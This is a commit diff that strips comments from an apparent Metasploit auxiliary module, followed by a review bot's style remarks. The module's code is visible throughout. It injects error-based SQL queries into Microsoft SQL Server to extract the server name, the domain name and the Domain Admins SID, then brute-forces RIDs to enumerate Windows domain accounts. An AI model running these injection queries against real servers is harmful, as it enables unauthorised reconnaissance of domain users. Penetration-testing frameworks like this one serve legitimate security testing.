Delete unnecessary comments
* No need to comment every step, just relevant comments to understand code.bug/bundler_fix
parent
f93dbc6deb
commit
cd43f83cd7
|
@ -39,7 +39,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
def run
|
def run
|
||||||
|
|
||||||
# Get the server name
|
|
||||||
print_status("#{peer} - Grabbing the server and domain name...")
|
print_status("#{peer} - Grabbing the server and domain name...")
|
||||||
db_server_name = get_server_name
|
db_server_name = get_server_name
|
||||||
if db_server_name.nil?
|
if db_server_name.nil?
|
||||||
|
@ -49,7 +48,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_good("#{peer} - Server name: #{db_server_name}")
|
print_good("#{peer} - Server name: #{db_server_name}")
|
||||||
end
|
end
|
||||||
|
|
||||||
# Get the domain name of the SQL Server
|
|
||||||
db_domain_name = get_domain_name
|
db_domain_name = get_domain_name
|
||||||
if db_domain_name.nil?
|
if db_domain_name.nil?
|
||||||
print_error("#{peer} - Unable to grab domain name")
|
print_error("#{peer} - Unable to grab domain name")
|
||||||
|
@ -64,7 +62,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_good("#{peer} - Domain name: #{db_domain_name}")
|
print_good("#{peer} - Domain name: #{db_domain_name}")
|
||||||
end
|
end
|
||||||
|
|
||||||
# Get the SID for the domain
|
|
||||||
print_status("#{peer} - Grabbing the SID for the domain...")
|
print_status("#{peer} - Grabbing the SID for the domain...")
|
||||||
windows_domain_sid = get_windows_domain_sid(db_domain_name)
|
windows_domain_sid = get_windows_domain_sid(db_domain_name)
|
||||||
if windows_domain_sid.nil?
|
if windows_domain_sid.nil?
|
||||||
|
@ -121,17 +118,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_status("Query results have been saved to: #{path}")
|
print_status("Query results have been saved to: #{path}")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Get the server name
|
||||||
def get_server_name
|
def get_server_name
|
||||||
|
|
||||||
# Setup query
|
|
||||||
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
|
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
|
||||||
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
|
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
|
||||||
sql = "(select '#{clue_start}'+@@servername+'#{clue_end}')"
|
sql = "(select '#{clue_start}'+@@servername+'#{clue_end}')"
|
||||||
|
|
||||||
# Run query
|
|
||||||
result = mssql_query(sql)
|
result = mssql_query(sql)
|
||||||
|
|
||||||
# Parse result
|
|
||||||
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
|
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
|
||||||
instance_name = $1
|
instance_name = $1
|
||||||
sql_server_name = instance_name.split('\\')[0]
|
sql_server_name = instance_name.split('\\')[0]
|
||||||
|
@ -142,17 +136,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
sql_server_name
|
sql_server_name
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Get the domain name of the SQL Server
|
||||||
def get_domain_name
|
def get_domain_name
|
||||||
|
|
||||||
# Setup query
|
|
||||||
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
|
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
|
||||||
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
|
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
|
||||||
sql = "(select '#{clue_start}'+DEFAULT_DOMAIN()+'#{clue_end}')"
|
sql = "(select '#{clue_start}'+DEFAULT_DOMAIN()+'#{clue_end}')"
|
||||||
|
|
||||||
# Run query
|
|
||||||
result = mssql_query(sql)
|
result = mssql_query(sql)
|
||||||
|
|
||||||
# Parse result
|
|
||||||
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
|
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
|
||||||
domain_name = $1
|
domain_name = $1
|
||||||
else
|
else
|
||||||
|
@ -162,27 +153,20 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
domain_name
|
domain_name
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Get the SID for the domain
|
||||||
def get_windows_domain_sid(db_domain_name)
|
def get_windows_domain_sid(db_domain_name)
|
||||||
|
|
||||||
# Setup group
|
|
||||||
domain_group = "#{db_domain_name}\\Domain Admins"
|
domain_group = "#{db_domain_name}\\Domain Admins"
|
||||||
|
|
||||||
# Randomized start and stop flags
|
|
||||||
clue_start = Rex::Text.rand_text_alpha(8)
|
clue_start = Rex::Text.rand_text_alpha(8)
|
||||||
clue_end = Rex::Text.rand_text_alpha(8)
|
clue_end = Rex::Text.rand_text_alpha(8)
|
||||||
|
|
||||||
# Setup query
|
|
||||||
sql = "(select cast('#{clue_start}'+(select stuff(upper(sys.fn_varbintohexstr((SELECT SUSER_SID('#{domain_group}')))), 1, 2, ''))+'#{clue_end}' as int))"
|
sql = "(select cast('#{clue_start}'+(select stuff(upper(sys.fn_varbintohexstr((SELECT SUSER_SID('#{domain_group}')))), 1, 2, ''))+'#{clue_end}' as int))"
|
||||||
|
|
||||||
# Run query
|
|
||||||
result = mssql_query(sql)
|
result = mssql_query(sql)
|
||||||
|
|
||||||
# Parse result
|
|
||||||
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
|
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
|
||||||
object_sid = $1
|
object_sid = $1
|
||||||
domain_sid = object_sid[0..47]
|
domain_sid = object_sid[0..47]
|
||||||
|
|
||||||
# Return if sid does not resolve for a domain
|
|
||||||
return nil if domain_sid.empty?
|
return nil if domain_sid.empty?
|
||||||
else
|
else
|
||||||
domain_sid = nil
|
domain_sid = nil
|
||||||
|
@ -191,14 +175,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
domain_sid
|
domain_sid
|
||||||
end
|
end
|
||||||
|
|
||||||
# Get list of windows accounts,groups,and computer accounts
|
# Get list of windows accounts, groups and computer accounts
|
||||||
def get_win_domain_users(windows_domain_sid)
|
def get_win_domain_users(windows_domain_sid)
|
||||||
|
|
||||||
# Randomized start and stop flags
|
|
||||||
clue_start = Rex::Text.rand_text_alpha(8)
|
clue_start = Rex::Text.rand_text_alpha(8)
|
||||||
clue_end = Rex::Text.rand_text_alpha(8)
|
clue_end = Rex::Text.rand_text_alpha(8)
|
||||||
|
|
||||||
# Create array to store the windws accounts etc
|
|
||||||
windows_logins = []
|
windows_logins = []
|
||||||
|
|
||||||
# Fuzz the principal_id parameter (RID in this case) passed to the SUSER_NAME function
|
# Fuzz the principal_id parameter (RID in this case) passed to the SUSER_NAME function
|
||||||
|
@ -224,23 +205,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
return nil
|
return nil
|
||||||
end
|
end
|
||||||
|
|
||||||
# Setup query
|
|
||||||
sql = "(SELECT '#{clue_start}'+(SELECT SUSER_SNAME(#{win_sid}) as name)+'#{clue_end}')"
|
sql = "(SELECT '#{clue_start}'+(SELECT SUSER_SNAME(#{win_sid}) as name)+'#{clue_end}')"
|
||||||
|
|
||||||
# Execute query
|
|
||||||
result = mssql_query(sql)
|
result = mssql_query(sql)
|
||||||
|
|
||||||
# Parse result
|
|
||||||
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
|
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
|
||||||
windows_login = $1
|
windows_login = $1
|
||||||
|
|
||||||
# Print account,group,or computer account etc
|
|
||||||
if windows_login.length != 0
|
if windows_login.length != 0
|
||||||
print_status("#{peer} - #{windows_login}")
|
print_status("#{peer} - #{windows_login}")
|
||||||
|
|
||||||
# Add to windows domain object list
|
|
||||||
windows_logins.push(windows_login) unless windows_logins.include?(windows_login)
|
windows_logins.push(windows_login) unless windows_logins.include?(windows_login)
|
||||||
|
|
||||||
# Verbose output
|
# Verbose output
|
||||||
vprint_status("#{peer} - Test sid: #{win_sid}")
|
vprint_status("#{peer} - Test sid: #{win_sid}")
|
||||||
end
|
end
|
||||||
|
@ -248,7 +222,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
# Return list of windows accounts
|
|
||||||
windows_logins
|
windows_logins
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
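Review bot: In the get_windows_domain_sid hunk (@ -162,27 +153,20), dropping the comment around `domain_sid = object_sid[0..47]` and `return nil if domain_sid.empty?` leaves a magic slice and a guard that no longer say why they exist, which is exactly the kind of comment the commit message says should be kept. I would put `# keep the 48-hex-char (24-byte) domain prefix of the SID and drop the trailing RID -- assumes the query returns the full SID in hex` above the slice and `# an unresolvable name yields no domain SID` on the guard, rather than leaving them bare. A small style point in the same hunk and in get_win_domain_users (@ -224,23 +205,16): the `$1` captures after the `=~` tests would read better as `Regexp.last_match(1)`. The method's return value and closing `end` are in the following hunk, outside this one.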